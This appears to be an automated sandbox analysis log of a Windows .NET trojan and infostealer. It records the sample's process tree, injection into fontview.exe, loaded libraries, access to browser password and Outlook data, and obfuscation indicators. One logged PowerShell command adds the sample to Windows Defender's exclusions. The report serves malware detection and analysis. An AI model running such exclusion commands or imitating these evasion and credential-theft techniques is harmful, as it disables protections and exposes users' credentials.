    Source: Item-RQF-9456786.exe, 00000000.00000002.2290482107.0000000007590000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000000.2259200475.00000000004E4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamextjX.exe* vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000002.2271370211.0000000002A46000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000002.2270734799.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000000.00000002.2287993204.0000000006D40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000005.00000002.2565556975.000000000189D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFONTVIEW.EXEj% vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFONTVIEW.EXEj% vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe Binary or memory string: OriginalFilenamextjX.exe* vs Item-RQF-9456786.exe
    Source: Item-RQF-9456786.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Item-RQF-9456786.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.cs Security API names: _0020.SetAccessControl
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.cs Security API names: _0020.AddAccessRule
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, Rl3VgVQKcLZDKcmexA.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, Rl3VgVQKcLZDKcmexA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.cs Security API names: _0020.SetAccessControl
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.cs Security API names: _0020.AddAccessRule
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, Rl3VgVQKcLZDKcmexA.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, Rl3VgVQKcLZDKcmexA.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/7@18/14
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Item-RQF-9456786.exe.log
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5esf122w.kax.ps1
    Source: Item-RQF-9456786.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe File read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: fontview.exe, 0000000A.00000002.4740849571.0000000003303000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOIN0;0
    Source: fontview.exe, 0000000A.00000002.4740849571.0000000003351000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2744483253.0000000003324000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2747090913.000000000332D000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4740849571.0000000003324000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: Item-RQF-9456786.exe ReversingLabs: Detection: 39%
    Source: unknown Process created: C:\Users\user\Desktop\Item-RQF-9456786.exe "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Process created: C:\Users\user\Desktop\Item-RQF-9456786.exe "C:\Users\user\Desktop\Item-RQF-9456786.exe"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe Process created: C:\Windows\SysWOW64\fontview.exe "C:\Windows\SysWOW64\fontview.exe"
    Source: C:\Windows\SysWOW64\fontview.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: version.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: dwrite.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: textshaping.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: iconcodecservice.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: edputil.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: appresolver.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: bcp47langs.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: slc.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: sppc.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
    Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: ieframe.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: version.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: wkscli.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: mlang.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: winsqlite3.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: vaultcli.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\fontview.exe Section loaded: cryptbase.dll
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe Section loaded: wininet.dll
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe Section loaded: mswsock.dll
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe Section loaded: dnsapi.dll
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe Section loaded: iphlpapi.dll
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe Section loaded: fwpuclnt.dll
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe Section loaded: rasadhlp.dll
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: C:\Windows\SysWOW64\fontview.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
    Source: Item-RQF-9456786.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: Item-RQF-9456786.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Item-RQF-9456786.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: fontview.pdbGCTL source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fontview.pdb source: Item-RQF-9456786.exe, 00000005.00000002.2562527494.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 00000009.00000002.4741009013.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdbSHA256}Mz source: Item-RQF-9456786.exe
    Source: Binary string: wntdll.pdbUGP source: Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: Item-RQF-9456786.exe, Item-RQF-9456786.exe, 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, fontview.exe, 0000000A.00000002.4742681098.000000000513E000.00000040.00001000.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2560730066.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000003.2568690850.0000000004DF2000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000A.00000002.4742681098.0000000004FA0000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: xtjX.pdb source: Item-RQF-9456786.exe

    Data Obfuscation

    Source: 0.2.Item-RQF-9456786.exe.6d40000.5.raw.unpack, rf329e9anUujL1N2Fn.cs .Net Code: jv3yWNB5U9 System.Reflection.Assembly.Load(byte[])
    Source: 0.2.Item-RQF-9456786.exe.3c72bb0.4.raw.unpack, rf329e9anUujL1N2Fn.cs .Net Code: jv3yWNB5U9 System.Reflection.Assembly.Load(byte[])
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00418883 push esi; iretd 5_2_0041888F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00414920 pushfd ; retf 5_2_00414922
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_0041AA63 push es; iretd 5_2_0041AB3F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00416A03 push es; ret 5_2_00416AB2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_004022F1 push edx; iretd 5_2_004022F2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00401A8E push edx; iretd 5_2_00401A8F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00418347 push es; retf 5_2_0041834A
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00402356 push edx; iretd 5_2_0040235F
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00402336 push edx; iretd 5_2_00402337
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00415C35 push ebx; ret 5_2_00415C5C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00415C8E push ebx; ret 5_2_00415C5C
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_0040249B push edx; iretd 5_2_0040249E
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_004035D0 push eax; ret 5_2_004035D2
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_004186A4 push edx; retf 5_2_004186A6
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00412775 push esp; iretd 5_2_00412780
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00418776 push 3344722Fh; retf 5_2_0041877B
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_004017C4 push esi; ret 5_2_004017C5
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_00426FF3 push edi; ret 5_2_00426FFE
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Code function: 5_2_017A09AD push ecx; mov dword ptr [esp], ecx 5_2_017A09B6
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_04FD09AD push ecx; mov dword ptr [esp], ecx 10_2_04FD09B6
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_03024310 push 0000004Bh; retf 10_2_0302435A
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_0301C258 push ss; retf 10_2_0301C279
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_030152B0 push esi; iretd 10_2_030152BC
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_03021142 push eax; iretd 10_2_03021143
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_0300F1A2 push esp; iretd 10_2_0300F1AD
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_030151A3 push 3344722Fh; retf 10_2_030151A8
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_030150D1 push edx; retf 10_2_030150D3
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_030210F9 push esi; retf 10_2_030210FA
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_03007710 push esi; ret 10_2_03007817
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_030077E1 push esi; ret 10_2_03007817
    Source: C:\Windows\SysWOW64\fontview.exe Code function: 10_2_03020623 pushad ; iretd 10_2_0302062C
    Source: Item-RQF-9456786.exe Static PE information: section name: .text entropy: 7.853755430579226

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
